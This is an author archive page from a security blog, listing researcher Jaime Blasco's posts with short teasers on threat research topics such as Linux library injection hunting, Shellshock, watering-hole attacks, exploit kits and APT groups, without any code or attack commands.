Hunting for Linux library injection with Osquery

June 20, 2019 | Jaime Blasco
Jaime Blasco

Jaime Blasco

Vice President and Chief Scientist

Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AT&T Cybersecurity, Jaime leads the Alien Labs Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AT&T, Jaime was Chief Scientist at AlienVault. Prior to that, he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.

June 20, 2019 | Jaime Blasco

Hunting for Linux library injection with Osquery

When analyzing malware and adversary activity in Windows environments, DLL injection techniques are commonly used, and there are plenty of resources on how to detect these activities. When it comes to Linux, this is less commonly seen in the wild. I recently came across a great blog from TrustedSec that describes a few techniques and tools that can be used…

May 4, 2017 | Jaime Blasco

OAuth Worm Targeting Google Users - You Need to Watch Cloud Services

Yesterday, many people received an e-mail from someone they knew and trusted asking them to open a "Google Doc.” The email looked, felt, and smelled like the real thing—an email that Google normally sends whenever a share request is made. However, the email contained a button that mimicked a link to open a document in Google Docs. When users…

March 14, 2017 | Jaime Blasco

Apache Struts Vulnerability Being Exploited by Attackers

Normally new variants of ransomware families aren't particularly interesting. SamSam, however, is different. Whereas most ransomware is automatically propagated, SamSam is deployed manually. In addition, the group behind SamSam charges very high ransoms because of the amount of effort invested in their operations, which made them the subject of two FBI Alerts last year. The attacks seem to peak…

March 9, 2017 | Jaime Blasco

11 Simple Yet Important Tips to Secure AWS

This is the first in a series of blogs dedicated to Amazon Web Services (AWS) security monitoring and best practices. AWS Security Best Practices As more and more organizations of all sizes are moving applications and workloads to the public cloud, it is critical to understand the security challenges of the cloud in general, and AWS in particular. IT environments…

February 24, 2016 | Jaime Blasco

Operation BlockBuster unveils the actors behind the Sony attacks

Today, a coordinated coalition involving AlienVault and several other security companies led by Novetta is announcing Operation BlockBuster. This industry initiative was created to share information and potentially disrupt the infrastructure and tools from an actor named the Lazarus Group. The Lazarus Group has been responsible for several operations since at least 2009, including the attack that affected Sony Pictures Entertainment…

July 28, 2015 | Jaime Blasco

Open Threat Exchange (OTX) - Now Including Social Sharing of Threat Data

The threat landscape is constantly evolving and it is even more of a challenge for organizations, especially those in the mid-market, to detect where the true threats lie without tapping into a broader and often already stretched IT Budget. To help solve this problem, AlienVault developed a free platform called Open Threat Exchange (OTX) to help organizations gain greater visibility…

June 11, 2015 | Jaime Blasco

Watering holes exploiting JSONP hijacking to track users in China

By: Eddie Lee and Jaime Blasco   Imagine if an authoritarian state had a tool to get private information about users visiting certain websites, including real names, mail addresses, sex, birthdays, phone numbers, etc. Imagine that even users that run TOR or VPN connections to bypass the tools that the authoritarian government uses to block and monitor these websites were…

October 28, 2014 | Jaime Blasco

From Russia with love: Sofacy/Sednit/APT28 is in town

Yesterday, another cyber espionage group with Russian roots made it to the New York Times headlines again courtesy of FireEye and a new report they published. FireEye did a pretty good job on attribution and giving some technical indicators; however, they neglected to reference previous work on this threat actor from companies like PWC, TrendMicro, ESET and others. We have…

September 25, 2014 | Jaime Blasco

Attackers exploiting Shellshock (CVE-2014-6271) in the wild

Yesterday, a new vulnerability affecting Bash (CVE-2014-6271) was published. The new vulnerability allows attackers to execute arbitrary commands formatting an environmental variable using a specific format. It affects Bash (the Bourne Again SHell), the default command shell for Linux and other UNIX flavors inlcuding Mac OS X. The vulnerability is critical since it can be exposed on web servers…

September 15, 2014 | Jaime Blasco

Archie: Just another Exploit kit

We have previously described how Exploit Kits are some of the favorite techniques used by cybercriminals to install malicious software on victims' systems. The number of Exploit Kits available has experienced exponential growth in the last few years. Since Blackhole’s author was arrested in 2013, the number of Exploit Kits has increased - including Neutrino, Magnitude, Nuclear, Rig and…

August 28, 2014 | Jaime Blasco

Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks

A few days ago we detected a watering hole campaign in a website owned by one big industrial company. The website is related to software used for simulation and system engineering in a wide range of industries, including automotive, aerospace, and manufacturing. The attackers were able to compromise the website and include code that loaded a…

July 25, 2014 | Jaime Blasco

Attackers abusing Internet Explorer to enumerate software and detect security products

During the last few years we have seen an increase on the number of malicious actors using tricks and browser vulnerabilities to enumerate the software that is running on the victim’s system using Internet Explorer. In this blog post we will describe some of the techniques that attackers are using to perform reconnaisance that gives them information for…